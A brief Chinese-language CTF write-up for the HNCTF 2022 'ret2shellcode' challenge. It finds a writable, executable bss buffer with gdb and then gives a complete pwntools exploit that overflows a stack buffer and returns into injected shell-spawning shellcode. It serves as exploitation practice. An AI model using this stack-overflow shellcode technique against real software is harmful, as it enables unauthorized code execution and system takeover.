HNCTF 2022 Week1-ret2shellcode

查看保护直接扔64位

IDA64

没有/bin/sh字样 根据题目可以知道是ret2shellcode

注意需要找到可读可写的bss字段 所以我们gdb设断点到main

然后一路ni到call read

然后vmmap

发现0x404000 0x405000 rwxp 段可读可写 从ida查到是buff全局变量 所以我们可以往里面写shellcode

exp

from pwn import *
from LibcSearcher import *
context(
    terminal=["wt.exe","wsl"],
    os = "linux",
    arch = "amd64",
    #arch = "i386",
    log_level="debug",
)
elf = ELF("./pwn")
io = process("./pwn")
#io = remote("node5.anna.nssctf.cn",28190)
def debug():
    gdb.attach(io)
    pause()
#debug()
offet = 0x100+0x8
shellcode = asm(shellcraft.sh())
print(shellcode)
buff_addr = elf.sym['buff']
print(hex(buff_addr))
payload = shellcode.ljust(offet,b'\x00')+ p64(buff_addr)
io.sendline(payload)
io.interactive()

payload = shellcode.ljust(offet,b'\x00')+ p64(buff_addr)中.ljust(offet,b'\x00')段意思是补全到offet的量 其余用\x00替代